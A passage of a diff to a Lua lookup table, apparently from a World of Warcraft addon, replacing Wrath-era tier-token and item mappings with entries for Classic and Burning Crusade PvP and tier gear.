Valorous Bonescythe Gauntlets - 40552, -- Valorous Scourgeborne Gauntlets - 40563, -- Valorous Scourgeborne Handguards + -- Blood Guard's Silk Walkers + ["22860"] = { + 227110, -- Blood Guard's Silk Walkers }, - -- Crown of the Lost Conqueror - ["40631"] = { - 40421, -- Valorous Plagueheart Circlet - 40447, -- Valorous Crown of Faith - 40456, -- Valorous Circlet of Faith - 40571, -- Valorous Redemption Headpiece - 40576, -- Valorous Redemption Helm - 40581, -- Valorous Redemption Faceguard + -- Blood Guard's Chain Vices + ["22862"] = { + 227075, -- Blood Guard's Chain Vices }, - -- Crown of the Lost Protector - ["40632"] = { - 40505, -- Valorous Cryptstalker Headpiece - 40510, -- Valorous Earthshatter Headpiece - 40516, -- Valorous Earthshatter Helm - 40521, -- Valorous Earthshatter Faceguard - 40528, -- Valorous Dreadnaught Helmet - 40546, -- Valorous Dreadnaught Greathelm + -- Blood Guard's Dragonhide Grips + ["22863"] = { + 227180, -- Blood Guard's Dragonhide Grips }, - -- Crown of the Lost Vanquisher - ["40633"] = { - 40416, -- Valorous Frostfire Circlet - 40461, -- Valorous Dreamwalker Headpiece - 40467, -- Valorous Dreamwalker Cover - 40473, -- Valorous Dreamwalker Headguard - 40499, -- Valorous Bonescythe Helmet - 40554, -- Valorous Scourgeborne Helmet - 40565, -- Valorous Scourgeborne Faceguard + -- Blood Guard's Leather Grips + ["22864"] = { + 227063, -- Blood Guard's Leather Grips }, - -- Legplates of the Lost Conqueror - ["40634"] = { - 40422, -- Valorous Plagueheart Leggings - 40448, -- Valorous Leggings of Faith - 40457, -- Valorous Pants of Faith - 40572, -- Valorous Redemption Greaves - 40577, -- Valorous Redemption Legplates - 40583, -- Valorous Redemption Legguards + -- Blood Guard's Dreadweave Handwraps + ["22865"] = { + 227099, -- Blood Guard's Dreadweave Handwraps }, - -- Legplates of the Lost Protector - ["40635"] = { - 40506, -- Valorous Cryptstalker Legguards - 40512, -- Valorous Earthshatter Legguards - 40517, -- Valorous Earthshatter Kilt - 40522, -- Valorous Earthshatter War-Kilt - 40529, -- Valorous Dreadnaught Legplates - 40547, -- Valorous Dreadnaught Legguards + -- Blood Guard's Mail Vices + ["22867"] = { + 227159, -- Blood Guard's Mail Vices }, - -- Legplates of the Lost Vanquisher - ["40636"] = { - 40417, -- Valorous Frostfire Leggings - 40462, -- Valorous Dreamwalker Leggings - 40468, -- Valorous Dreamwalker Trousers - 40493, -- Valorous Dreamwalker Legguards - 40500, -- Valorous Bonescythe Legplates - 40556, -- Valorous Scourgeborne Legplates - 40567, -- Valorous Scourgeborne Legguards + -- Blood Guard's Plate Gauntlets + ["22868"] = { + 227050, -- Blood Guard's Plate Gauntlets }, - -- Mantle of the Lost Conqueror - ["40637"] = { - 40424, -- Valorous Plagueheart Shoulderpads - 40450, -- Valorous Shoulderpads of Faith - 40459, -- Valorous Mantle of Faith - 40573, -- Valorous Redemption Spaulders - 40578, -- Valorous Redemption Shoulderplates - 40584, -- Valorous Redemption Shoulderguards + -- Blood Guard's Satin Handwraps + ["22869"] = { + 227126, -- Blood Guard's Satin Handwraps }, - -- Mantle of the Lost Protector - ["40638"] = { - 40507, -- Valorous Cryptstalker Spaulders - 40513, -- Valorous Earthshatter Spaulders - 40518, -- Valorous Earthshatter Shoulderpads - 40524, -- Valorous Earthshatter Shoulderguards - 40530, -- Valorous Dreadnaught Shoulderplates - 40548, -- Valorous Dreadnaught Pauldrons + -- Blood Guard's Silk Handwraps + ["22870"] = { + 227111, -- Blood Guard's Silk Handwraps }, - -- Mantle of the Lost Vanquisher - ["40639"] = { - 40419, -- Valorous Frostfire Shoulderpads - 40465, -- Valorous Dreamwalker Spaulders - 40470, -- Valorous Dreamwalker Mantle - 40494, -- Valorous Dreamwalker Shoulderpads - 40502, -- Valorous Bonescythe Pauldrons - 40557, -- Valorous Scourgeborne Shoulderplates - 40568, -- Valorous Scourgeborne Pauldrons + -- Legionnaire's Plate Hauberk + ["22872"] = { + 227049, -- Legionnaire's Plate Hauberk }, - -- Key to the Focusing Iris - ["44569"] = { - 44582, -- Key to the Focusing Iris - 44650, -- Heart of Magic (Normal) - 44657, -- Torque of the Red Dragonflight - 44658, -- Chain of the Ancient Wyrm - 44659, -- Pendant of the Dragonsworn - 44660, -- Drakescale Collar + -- Legionnaire's Plate Leggings + ["22873"] = { + 227048, -- Legionnaire's Plate Leggings }, - -- Heroic Key to the Focusing Iris - ["44577"] = { - 44581, -- Heroic Key to the Focusing Iris - 44651, -- Heart of Magic (Heroic) - 44661, -- Wyrmrest Necklace of Power - 44662, -- Life-Binder's Locket - 44664, -- Favor of the Dragon Queen - 44665, -- Nexus War Champion Beads + -- Legionnaire's Chain Hauberk + ["22874"] = { + 227071, -- Legionnaire's Chain Hauberk }, - -- Heroic Key to the Focusing Iris - ["44581"] = { - 44577, -- Heroic Key to the Focusing Iris + -- Legionnaire's Chain Legguards + ["22875"] = { + 227073, -- Legionnaire's Chain Legguards }, - -- Key to the Focusing Iris - ["44582"] = { - 44569, -- Key to the Focusing Iris + -- Legionnaire's Mail Hauberk + ["22876"] = { + 227157, -- Legionnaire's Mail Hauberk }, - -- Heart of Magic (Normal) - ["44650"] = { - 44569, -- Key to the Focusing Iris + -- Legionnaire's Dragonhide Chestpiece + ["22877"] = { + 227179, -- Legionnaire's Dragonhide Chestpiece }, - -- Heart of Magic (Heroic) - ["44651"] = { - 44577, -- Heroic Key to the Focusing Iris + -- Legionnaire's Dragonhide Leggings + ["22878"] = { + 227177, -- Legionnaire's Dragonhide Leggings }, - -- Torque of the Red Dragonflight - ["44657"] = { - 44569, -- Key to the Focusing Iris + -- Legionnaire's Leather Chestpiece + ["22879"] = { + 227060, -- Legionnaire's Leather Chestpiece }, - -- Chain of the Ancient Wyrm - ["44658"] = { - 44569, -- Key to the Focusing Iris + -- Legionnaire's Leather Legguards + ["22880"] = { + 227059, -- Legionnaire's Leather Legguards }, - -- Pendant of the Dragonsworn - ["44659"] = { - 44569, -- Key to the Focusing Iris + -- Legionnaire's Dreadweave Legguards + ["22881"] = { + 227097, -- Legionnaire's Dreadweave Legguards }, - -- Drakescale Collar - ["44660"] = { - 44569, -- Key to the Focusing Iris + -- Legionnaire's Satin Legguards + ["22882"] = { + 227123, -- Legionnaire's Satin Legguards }, - -- Wyrmrest Necklace of Power - ["44661"] = { - 44577, -- Heroic Key to the Focusing Iris + -- Legionnaire's Silk Legguards + ["22883"] = { + 227107, -- Legionnaire's Silk Legguards }, - -- Life-Binder's Locket - ["44662"] = { - 44577, -- Heroic Key to the Focusing Iris + -- Legionnaire's Dreadweave Tunic + ["22884"] = { + 227094, -- Legionnaire's Dreadweave Tunic }, - -- Favor of the Dragon Queen - ["44664"] = { - 44577, -- Heroic Key to the Focusing Iris + -- Legionnaire's Satin Tunic + ["22885"] = { + 227124, -- Legionnaire's Satin Tunic }, - -- Nexus War Champion Beads - ["44665"] = { - 44577, -- Heroic Key to the Focusing Iris + -- Legionnaire's Silk Tunic + ["22886"] = { + 227106, -- Legionnaire's Silk Tunic }, - -- Fragment of Val'anyr - ["45038"] = { - 45039, -- Shattered Fragments of Val'anyr - 45896, -- Unbound Fragments of Val'anyr - 45897, -- Reforged Hammer of Ancient Kings - 46017, -- Val'anyr, Hammer of Ancient Kings + -- Legionnaire's Mail Legguards + ["22887"] = { + 227156, -- Legionnaire's Mail Legguards }, - -- Shattered Fragments of Val'anyr - ["45039"] = { - 45038, -- Fragment of Val'anyr + -- Lord Blackwood's Buckler + ["23139"] = { + 228035, -- Lord Blackwood's Buckler }, - -- Runed Orb - ["45087"] = { - 45550, -- Belt of the Titans - 45551, -- Indestructible Plate Girdle - 45552, -- Plate Girdle of Righteousness - 45553, -- Belt of Dragons - 45554, -- Blue Belt of Chaos - 45555, -- Death-warmed Belt - 45556, -- Belt of Arctic Life - 45557, -- Sash of Ancient Power - 45558, -- Cord of the White Dawn - 45559, -- Battlelord's Plate Boots - 45560, -- Spiked Deathdealers - 45561, -- Treads of Destiny - 45562, -- Boots of Living Scale - 45563, -- Lightning Grounded Boots - 45564, -- Footpads of Silence - 45565, -- Boots of Wintry Endurance - 45566, -- Spellslinger's Slippers - 45567, -- Savior's Slippers + -- Totem of Sustaining + ["23200"] = { + 228049, -- Totem of Sustaining }, - -- Valorous Darkruned Chestguard - ["45335"] = { - 45637, -- Chestguard of the Wayward Vanquisher + -- Libram of Divinity + ["23201"] = { + 228048, -- Libram of Divinity }, - -- Valorous Darkruned Faceguard - ["45336"] = { - 45649, -- Helm of the Wayward Vanquisher + -- Mark of the Champion + ["23206"] = { + 22520, -- The Phylactery of Kel'Thuzad }, - -- Valorous Darkruned Handguards - ["45337"] = { - 45646, -- Gloves of the Wayward Vanquisher + -- Mark of the Champion + ["23207"] = { + 22520, -- The Phylactery of Kel'Thuzad }, - -- Valorous Darkruned Legguards - ["45338"] = { - 45652, -- Leggings of the Wayward Vanquisher + -- Champion's Plate Shoulders + ["23243"] = { + 227042, -- Champion's Plate Shoulders }, - -- Valorous Darkruned Pauldrons - ["45339"] = { - 45661, -- Spaulders of the Wayward Vanquisher + -- Champion's Plate Helm + ["23244"] = { + 227043, -- Champion's Plate Helm }, - -- Valorous Darkruned Battleplate - ["45340"] = { - 45637, -- Chestguard of the Wayward Vanquisher + -- Champion's Chain Helm + ["23251"] = { + 227067, -- Champion's Chain Helm }, - -- Valorous Darkruned Gauntlets - ["45341"] = { - 45646, -- Gloves of the Wayward Vanquisher + -- Champion's Chain Shoulders + ["23252"] = { + 227069, -- Champion's Chain Shoulders }, - -- Valorous Darkruned Helmet - ["45342"] = { - 45649, -- Helm of the Wayward Vanquisher + -- Champion's Dragonhide Headguard + ["23253"] = { + 227174, -- Champion's Dragonhide Headguard }, - -- Valorous Darkruned Legplates - ["45343"] = { - 45652, -- Leggings of the Wayward Vanquisher + -- Champion's Dragonhide Shoulders + ["23254"] = { + 227175, -- Champion's Dragonhide Shoulders }, - -- Valorous Darkruned Shoulderplates - ["45344"] = { - 45661, -- Spaulders of the Wayward Vanquisher - }, - -- Valorous Nightsong Handguards - ["45345"] = { - 45646, -- Gloves of the Wayward Vanquisher + -- Champion's Dreadweave Cowl + ["23255"] = { + 227090, -- Champion's Dreadweave Cowl }, - -- Valorous Nightsong Headpiece - ["45346"] = { - 45649, -- Helm of the Wayward Vanquisher + -- Champion's Dreadweave Spaulders + ["23256"] = { + 227092, -- Champion's Dreadweave Spaulders }, - -- Valorous Nightsong Leggings - ["45347"] = { - 45652, -- Leggings of the Wayward Vanquisher + -- Champion's Leather Helm + ["23257"] = { + 227057, -- Champion's Leather Helm }, - -- Valorous Nightsong Robe - ["45348"] = { - 45637, -- Chestguard of the Wayward Vanquisher + -- Champion's Leather Shoulders + ["23258"] = { + 227056, -- Champion's Leather Shoulders }, - -- Valorous Nightsong Spaulders - ["45349"] = { - 45661, -- Spaulders of the Wayward Vanquisher + -- Champion's Mail Headguard + ["23259"] = { + 227155, -- Champion's Mail Headguard }, - -- Valorous Nightsong Gloves - ["45351"] = { - 45646, -- Gloves of the Wayward Vanquisher + -- Champion's Mail Pauldrons + ["23260"] = { + 227154, -- Champion's Mail Pauldrons }, - -- Valorous Nightsong Mantle - ["45352"] = { - 45661, -- Spaulders of the Wayward Vanquisher + -- Champion's Satin Hood + ["23261"] = { + 227118, -- Champion's Satin Hood }, - -- Valorous Nightsong Trousers - ["45353"] = { - 45652, -- Leggings of the Wayward Vanquisher + -- Champion's Satin Mantle + ["23262"] = { + 227120, -- Champion's Satin Mantle }, - -- Valorous Nightsong Vestments - ["45354"] = { - 45637, -- Chestguard of the Wayward Vanquisher + -- Champion's Silk Cowl + ["23263"] = { + 227105, -- Champion's Silk Cowl }, - -- Valorous Nightsong Handgrips - ["45355"] = { - 45646, -- Gloves of the Wayward Vanquisher + -- Champion's Silk Mantle + ["23264"] = { + 227104, -- Champion's Silk Mantle }, - -- Valorous Nightsong Headguard - ["45356"] = { - 45649, -- Helm of the Wayward Vanquisher + -- Knight-Captain's Lamellar Breastplate + ["23272"] = { + 227142, -- Knight-Captain's Lamellar Breastplate }, - -- Valorous Nightsong Legguards - ["45357"] = { - 45652, -- Leggings of the Wayward Vanquisher + -- Knight-Captain's Lamellar Leggings + ["23273"] = { + 227143, -- Knight-Captain's Lamellar Leggings }, - -- Valorous Nightsong Raiments - ["45358"] = { - 45637, -- Chestguard of the Wayward Vanquisher + -- Knight-Lieutenant's Lamellar Gauntlets + ["23274"] = { + 227147, -- Knight-Lieutenant's Lamellar Gauntlets }, - -- Valorous Nightsong Shoulderpads - ["45359"] = { - 45661, -- Spaulders of the Wayward Vanquisher + -- Knight-Lieutenant's Lamellar Sabatons + ["23275"] = { + 227146, -- Knight-Lieutenant's Lamellar Sabatons }, - -- Valorous Scourgestalker Handguards - ["45360"] = { - 45645, -- Gloves of the Wayward Protector + -- Lieutenant Commander's Lamellar Headguard + ["23276"] = { + 227144, -- Lieutenant Commander's Lamellar Headguard }, - -- Valorous Scourgestalker Headpiece - ["45361"] = { - 45648, -- Helm of the Wayward Protector + -- Lieutenant Commander's Lamellar Shoulders + ["23277"] = { + 227145, -- Lieutenant Commander's Lamellar Shoulders }, - -- Valorous Scourgestalker Legguards - ["45362"] = { - 45651, -- Leggings of the Wayward Protector + -- Knight-Lieutenant's Chain Greaves + ["23278"] = { + 227076, -- Knight-Lieutenant's Chain Greaves }, - -- Valorous Scourgestalker Spaulders - ["45363"] = { - 45660, -- Spaulders of the Wayward Protector + -- Knight-Lieutenant's Chain Vices + ["23279"] = { + 227077, -- Knight-Lieutenant's Chain Vices }, - -- Valorous Scourgestalker Tunic - ["45364"] = { - 45636, -- Chestguard of the Wayward Protector + -- Knight-Lieutenant's Dragonhide Grips + ["23280"] = { + 227183, -- Knight-Lieutenant's Dragonhide Grips }, - -- Valorous Kirin Tor Hood - ["45365"] = { - 45649, -- Helm of the Wayward Vanquisher + -- Knight-Lieutenant's Dragonhide Treads + ["23281"] = { + 227182, -- Knight-Lieutenant's Dragonhide Treads }, - -- Valorous Kirin Tor Leggings - ["45367"] = { - 45652, -- Leggings of the Wayward Vanquisher + -- Knight-Lieutenant's Dreadweave Handwraps + ["23282"] = { + 227100, -- Knight-Lieutenant's Dreadweave Handwraps }, - -- Valorous Kirin Tor Tunic - ["45368"] = { - 45637, -- Chestguard of the Wayward Vanquisher + -- Knight-Lieutenant's Dreadweave Walkers + ["23283"] = { + 227101, -- Knight-Lieutenant's Dreadweave Walkers }, - -- Valorous Kirin Tor Shoulderpads - ["45369"] = { - 45661, -- Spaulders of the Wayward Vanquisher + -- Knight-Lieutenant's Leather Grips + ["23284"] = { + 227065, -- Knight-Lieutenant's Leather Grips }, - -- Valorous Aegis Gloves - ["45370"] = { - 45644, -- Gloves of the Wayward Conqueror + -- Knight-Lieutenant's Leather Walkers + ["23285"] = { + 227064, -- Knight-Lieutenant's Leather Walkers }, - -- Valorous Aegis Greaves - ["45371"] = { - 45650, -- Leggings of the Wayward Conqueror + -- Knight-Lieutenant's Plate Gauntlets + ["23286"] = { + 227053, -- Knight-Lieutenant's Plate Gauntlets }, - -- Valorous Aegis Headpiece - ["45372"] = { - 45647, -- Helm of the Wayward Conqueror + -- Knight-Lieutenant's Plate Greaves + ["23287"] = { + 227052, -- Knight-Lieutenant's Plate Greaves }, - -- Valorous Aegis Spaulders - ["45373"] = { - 45659, -- Spaulders of the Wayward Conqueror + -- Knight-Lieutenant's Satin Handwraps + ["23288"] = { + 227128, -- Knight-Lieutenant's Satin Handwraps }, - -- Valorous Aegis Tunic - ["45374"] = { - 45635, -- Chestguard of the Wayward Conqueror + -- Knight-Lieutenant's Satin Walkers + ["23289"] = { + 227129, -- Knight-Lieutenant's Satin Walkers }, - -- Valorous Aegis Battleplate - ["45375"] = { - 45635, -- Chestguard of the Wayward Conqueror + -- Knight-Lieutenant's Silk Handwraps + ["23290"] = { + 227113, -- Knight-Lieutenant's Silk Handwraps }, - -- Valorous Aegis Gauntlets - ["45376"] = { - 45644, -- Gloves of the Wayward Conqueror + -- Knight-Lieutenant's Silk Walkers + ["23291"] = { + 227112, -- Knight-Lieutenant's Silk Walkers }, - -- Valorous Aegis Helm - ["45377"] = { - 45647, -- Helm of the Wayward Conqueror + -- Knight-Captain's Chain Hauberk + ["23292"] = { + 227070, -- Knight-Captain's Chain Hauberk }, - -- Valorous Aegis Legplates - ["45379"] = { - 45650, -- Leggings of the Wayward Conqueror + -- Knight-Captain's Chain Legguards + ["23293"] = { + 227072, -- Knight-Captain's Chain Legguards }, - -- Valorous Aegis Shoulderplates - ["45380"] = { - 45659, -- Spaulders of the Wayward Conqueror + -- Knight-Captain's Dragonhide Chestpiece + ["23294"] = { + 227176, -- Knight-Captain's Dragonhide Chestpiece }, - -- Valorous Aegis Breastplate - ["45381"] = { - 45635, -- Chestguard of the Wayward Conqueror + -- Knight-Captain's Dragonhide Leggings + ["23295"] = { + 227178, -- Knight-Captain's Dragonhide Leggings }, - -- Valorous Aegis Faceguard - ["45382"] = { - 45647, -- Helm of the Wayward Conqueror + -- Knight-Captain's Dreadweave Legguards + ["23296"] = { + 227095, -- Knight-Captain's Dreadweave Legguards }, - -- Valorous Aegis Handguards - ["45383"] = { - 45644, -- Gloves of the Wayward Conqueror + -- Knight-Captain's Dreadweave Tunic + ["23297"] = { + 227096, -- Knight-Captain's Dreadweave Tunic }, - -- Valorous Aegis Legguards - ["45384"] = { - 45650, -- Leggings of the Wayward Conqueror + -- Knight-Captain's Leather Chestpiece + ["23298"] = { + 227058, -- Knight-Captain's Leather Chestpiece }, - -- Valorous Aegis Shoulderguards - ["45385"] = { - 45659, -- Spaulders of the Wayward Conqueror + -- Knight-Captain's Leather Legguards + ["23299"] = { + 227061, -- Knight-Captain's Leather Legguards }, - -- Valorous Cowl of Sanctification - ["45386"] = { - 45647, -- Helm of the Wayward Conqueror + -- Knight-Captain's Plate Hauberk + ["23300"] = { + 227046, -- Knight-Captain's Plate Hauberk }, - -- Valorous Gloves of Sanctification - ["45387"] = { - 45644, -- Gloves of the Wayward Conqueror + -- Knight-Captain's Plate Leggings + ["23301"] = { + 227047, -- Knight-Captain's Plate Leggings }, - -- Valorous Leggings of Sanctification - ["45388"] = { - 45650, -- Leggings of the Wayward Conqueror + -- Knight-Captain's Satin Legguards + ["23302"] = { + 227125, -- Knight-Captain's Satin Legguards }, - -- Valorous Robe of Sanctification - ["45389"] = { - 45635, -- Chestguard of the Wayward Conqueror + -- Knight-Captain's Satin Tunic + ["23303"] = { + 227122, -- Knight-Captain's Satin Tunic }, - -- Valorous Shoulderpads of Sanctification - ["45390"] = { - 45659, -- Spaulders of the Wayward Conqueror + -- Knight-Captain's Silk Legguards + ["23304"] = { + 227109, -- Knight-Captain's Silk Legguards }, - -- Valorous Circlet of Sanctification - ["45391"] = { - 45647, -- Helm of the Wayward Conqueror + -- Knight-Captain's Silk Tunic + ["23305"] = { + 227108, -- Knight-Captain's Silk Tunic }, - -- Valorous Handwraps of Sanctification - ["45392"] = { - 45644, -- Gloves of the Wayward Conqueror + -- Lieutenant Commander's Chain Helm + ["23306"] = { + 227066, -- Lieutenant Commander's Chain Helm }, - -- Valorous Mantle of Sanctification - ["45393"] = { - 45659, -- Spaulders of the Wayward Conqueror + -- Lieutenant Commander's Chain Shoulders + ["23307"] = { + 227068, -- Lieutenant Commander's Chain Shoulders }, - -- Valorous Pants of Sanctification - ["45394"] = { - 45650, -- Leggings of the Wayward Conqueror + -- Lieutenant Commander's Dragonhide Headguard + ["23308"] = { + 227173, -- Lieutenant Commander's Dragonhide Headguard }, - -- Valorous Raiments of Sanctification - ["45395"] = { - 45635, -- Chestguard of the Wayward Conqueror + -- Lieutenant Commander's Dragonhide Shoulders + ["23309"] = { + 227172, -- Lieutenant Commander's Dragonhide Shoulders }, - -- Valorous Terrorblade Breastplate - ["45396"] = { - 45637, -- Chestguard of the Wayward Vanquisher + -- Lieutenant Commander's Dreadweave Cowl + ["23310"] = { + 227093, -- Lieutenant Commander's Dreadweave Cowl }, - -- Valorous Terrorblade Gauntlets - ["45397"] = { - 45646, -- Gloves of the Wayward Vanquisher + -- Lieutenant Commander's Dreadweave Spaulders + ["23311"] = { + 227091, -- Lieutenant Commander's Dreadweave Spaulders }, - -- Valorous Terrorblade Helmet - ["45398"] = { - 45649, -- Helm of the Wayward Vanquisher + -- Lieutenant Commander's Leather Helm + ["23312"] = { + 227055, -- Lieutenant Commander's Leather Helm }, - -- Valorous Terrorblade Legplates - ["45399"] = { - 45652, -- Leggings of the Wayward Vanquisher + -- Lieutenant Commander's Leather Shoulders + ["23313"] = { + 227054, -- Lieutenant Commander's Leather Shoulders }, - -- Valorous Terrorblade Pauldrons - ["45400"] = { - 45661, -- Spaulders of the Wayward Vanquisher + -- Lieutenant Commander's Plate Helm + ["23314"] = { + 227044, -- Lieutenant Commander's Plate Helm }, - -- Valorous Worldbreaker Handguards - ["45401"] = { - 45645, -- Gloves of the Wayward Protector + -- Lieutenant Commander's Plate Shoulders + ["23315"] = { + 227045, -- Lieutenant Commander's Plate Shoulders }, - -- Valorous Worldbreaker Headpiece - ["45402"] = { - 45648, -- Helm of the Wayward Protector + -- Lieutenant Commander's Satin Hood + ["23316"] = { + 227121, -- Lieutenant Commander's Satin Hood }, - -- Valorous Worldbreaker Legguards - ["45403"] = { - 45651, -- Leggings of the Wayward Protector + -- Lieutenant Commander's Satin Mantle + ["23317"] = { + 227119, -- Lieutenant Commander's Satin Mantle }, - -- Valorous Worldbreaker Spaulders - ["45404"] = { - 45660, -- Spaulders of the Wayward Protector + -- Lieutenant Commander's Silk Cowl + ["23318"] = { + 227103, -- Lieutenant Commander's Silk Cowl }, - -- Valorous Worldbreaker Tunic - ["45405"] = { - 45636, -- Chestguard of the Wayward Protector + -- Lieutenant Commander's Silk Mantle + ["23319"] = { + 227102, -- Lieutenant Commander's Silk Mantle }, - -- Valorous Worldbreaker Gloves - ["45406"] = { - 45645, -- Gloves of the Wayward Protector + -- Fel Edged Battleaxe + ["23542"] = { + 23631, -- Plans: Fel Edged Battleaxe }, - -- Valorous Worldbreaker Helm - ["45408"] = { - 45648, -- Helm of the Wayward Protector + -- Plans: Fel Edged Battleaxe + ["23631"] = { + 23542, -- Fel Edged Battleaxe }, - -- Valorous Worldbreaker Kilt - ["45409"] = { - 45651, -- Leggings of the Wayward Protector + -- Naaru Lightwarden's Band + ["28790"] = { + 32385, -- Magtheridon's Head (Alliance) }, - -- Valorous Worldbreaker Shoulderpads - ["45410"] = { - 45660, -- Spaulders of the Wayward Protector + -- Ring of the Recalcitrant + ["28791"] = { + 32385, -- Magtheridon's Head (Alliance) }, - -- Valorous Worldbreaker Hauberk - ["45411"] = { - 45636, -- Chestguard of the Wayward Protector + -- A'dal's Signet of Defense + ["28792"] = { + 32385, -- Magtheridon's Head (Alliance) }, - -- Valorous Worldbreaker Faceguard - ["45412"] = { - 45648, -- Helm of the Wayward Protector + -- Band of Crimson Fury + ["28793"] = { + 32385, -- Magtheridon's Head (Alliance) }, - -- Valorous Worldbreaker Chestguard - ["45413"] = { - 45636, -- Chestguard of the Wayward Protector + -- Voidheart Crown + ["28963"] = { + 29759, -- Helm of the Fallen Hero }, - -- Valorous Worldbreaker Grips - ["45414"] = { - 45645, -- Gloves of the Wayward Protector + -- Voidheart Robe + ["28964"] = { + 29755, -- Chestguard of the Fallen Hero }, - -- Valorous Worldbreaker Shoulderguards - ["45415"] = { - 45660, -- Spaulders of the Wayward Protector + -- Voidheart Leggings + ["28966"] = { + 29765, -- Leggings of the Fallen Hero }, - -- Valorous Worldbreaker War-Kilt - ["45416"] = { - 45651, -- Leggings of the Wayward Protector + -- Voidheart Mantle + ["28967"] = { + 29762, -- Pauldrons of the Fallen Hero }, - -- Valorous Deathbringer Hood - ["45417"] = { - 45647, -- Helm of the Wayward Conqueror + -- Voidheart Gloves + ["28968"] = { + 29756, -- Gloves of the Fallen Hero }, - -- Valorous Deathbringer Gloves - ["45419"] = { - 45644, -- Gloves of the Wayward Conqueror + -- Warbringer Greathelm + ["29011"] = { + 29761, -- Helm of the Fallen Defender }, - -- Valorous Deathbringer Leggings - ["45420"] = { - 45650, -- Leggings of the Wayward Conqueror + -- Warbringer Chestguard + ["29012"] = { + 29753, -- Chestguard of the Fallen Defender }, - -- Valorous Deathbringer Robe - ["45421"] = { - 45635, -- Chestguard of the Wayward Conqueror + -- Warbringer Legguards + ["29015"] = { + 29767, -- Leggings of the Fallen Defender }, - -- Valorous Deathbringer Shoulderpads - ["45422"] = { - 45659, -- Spaulders of the Wayward Conqueror + -- Warbringer Shoulderguards + ["29016"] = { + 29764, -- Pauldrons of the Fallen Defender }, - -- Valorous Siegebreaker Breastplate - ["45424"] = { - 45636, -- Chestguard of the Wayward Protector + -- Warbringer Handguards + ["29017"] = { + 29758, -- Gloves of the Fallen Defender }, - -- Valorous Siegebreaker Greathelm - ["45425"] = { - 45648, -- Helm of the Wayward Protector + -- Warbringer Breastplate + ["29019"] = { + 29753, -- Chestguard of the Fallen Defender }, - -- Valorous Siegebreaker Handguards - ["45426"] = { - 45645, -- Gloves of the Wayward Protector + -- Warbringer Gauntlets + ["29020"] = { + 29758, -- Gloves of the Fallen Defender }, - -- Valorous Siegebreaker Legguards - ["45427"] = { - 45651, -- Leggings of the Wayward Protector + -- Warbringer Battle-Helm + ["29021"] = { + 29761, -- Helm of the Fallen Defender }, - -- Valorous Siegebreaker Pauldrons - ["45428"] = { - 45660, -- Spaulders of the Wayward Protector + -- Warbringer Greaves + ["29022"] = { + 29767, -- Leggings of the Fallen Defender }, - -- Valorous Siegebreaker Battleplate - ["45429"] = { - 45636, -- Chestguard of the Wayward Protector + -- Warbringer Shoulderplates + ["29023"] = { + 29764, -- Pauldrons of the Fallen Defender }, - -- Valorous Siegebreaker Gauntlets - ["45430"] = { - 45645, -- Gloves of the Wayward Protector + -- Cyclone Headdress + ["29028"] = { + 29760, -- Helm of the Fallen Champion }, - -- Valorous Siegebreaker Helmet - ["45431"] = { - 45648, -- Helm of the Wayward Protector + -- Cyclone Hauberk + ["29029"] = { + 29754, -- Chestguard of the Fallen Champion }, - -- Valorous Siegebreaker Legplates - ["45432"] = { - 45651, -- Leggings of the Wayward Protector + -- Cyclone Kilt + ["29030"] = { + 29766, -- Leggings of the Fallen Champion }, - -- Valorous Siegebreaker Shoulderplates - ["45433"] = { - 45660, -- Spaulders of the Wayward Protector + -- Cyclone Shoulderpads + ["29031"] = { + 29763, -- Pauldrons of the Fallen Champion }, - -- Belt of the Titans - ["45550"] = { - 45087, -- Runed Orb + -- Cyclone Gloves + ["29032"] = { + 29757, -- Gloves of the Fallen Champion }, - -- Indestructible Plate Girdle - ["45551"] = { - 45087, -- Runed Orb + -- Cyclone Chestguard + ["29033"] = { + 29754, -- Chestguard of the Fallen Champion }, - -- Plate Girdle of Righteousness - ["45552"] = { - 45087, -- Runed Orb + -- Cyclone Handguards + ["29034"] = { + 29757, -- Gloves of the Fallen Champion }, - -- Belt of Dragons - ["45553"] = { - 45087, -- Runed Orb + -- Cyclone Faceguard + ["29035"] = { + 29760, -- Helm of the Fallen Champion }, - -- Blue Belt of Chaos - ["45554"] = { - 45087, -- Runed Orb + -- Cyclone Legguards + ["29036"] = { + 29766, -- Leggings of the Fallen Champion }, - -- Death-warmed Belt - ["45555"] = { - 45087, -- Runed Orb + -- Cyclone Shoulderguards + ["29037"] = { + 29763, -- Pauldrons of the Fallen Champion }, - -- Belt of Arctic Life - ["45556"] = { - 45087, -- Runed Orb + -- Cyclone Breastplate + ["29038"] = { + 29754, -- Chestguard of the Fallen Champion }, - -- Sash of Ancient Power - ["45557"] = { - 45087, -- Runed Orb + -- Cyclone Gauntlets + ["29039"] = { + 29757, -- Gloves of the Fallen Champion }, - -- Cord of the White Dawn - ["45558"] = { - 45087, -- Runed Orb + -- Cyclone Helm + ["29040"] = { + 29760, -- Helm of the Fallen Champion }, - -- Battlelord's Plate Boots - ["45559"] = { - 45087, -- Runed Orb + -- Cyclone War-Kilt + ["29042"] = { + 29766, -- Leggings of the Fallen Champion }, - -- Spiked Deathdealers - ["45560"] = { - 45087, -- Runed Orb + -- Cyclone Shoulderplates + ["29043"] = { + 29763, -- Pauldrons of the Fallen Champion }, - -- Treads of Destiny - ["45561"] = { - 45087, -- Runed Orb + -- Netherblade Facemask + ["29044"] = { + 29760, -- Helm of the Fallen Champion }, - -- Boots of Living Scale - ["45562"] = { - 45087, -- Runed Orb + -- Netherblade Chestpiece + ["29045"] = { + 29754, -- Chestguard of the Fallen Champion }, - -- Lightning Grounded Boots - ["45563"] = { - 45087, -- Runed Orb + -- Netherblade Breeches + ["29046"] = { + 29766, -- Leggings of the Fallen Champion }, - -- Footpads of Silence - ["45564"] = { - 45087, -- Runed Orb + -- Netherblade Shoulderpads + ["29047"] = { + 29763, -- Pauldrons of the Fallen Champion }, - -- Boots of Wintry Endurance - ["45565"] = { - 45087, -- Runed Orb + -- Netherblade Gloves + ["29048"] = { + 29757, -- Gloves of the Fallen Champion }, - -- Spellslinger's Slippers - ["45566"] = { - 45087, -- Runed Orb + -- Light-Collar of the Incarnate + ["29049"] = { + 29761, -- Helm of the Fallen Defender }, - -- Savior's Slippers - ["45567"] = { - 45087, -- Runed Orb + -- Robes of the Incarnate + ["29050"] = { + 29753, -- Chestguard of the Fallen Defender }, - -- Drape of the Skyborn - ["45588"] = { - 46053, -- Reply-Code Alpha + -- Trousers of the Incarnate + ["29053"] = { + 29767, -- Leggings of the Fallen Defender }, - -- Brann's Signet Ring - ["45608"] = { - 46053, -- Reply-Code Alpha + -- Light-Mantle of the Incarnate + ["29054"] = { + 29764, -- Pauldrons of the Fallen Defender }, - -- Starshine 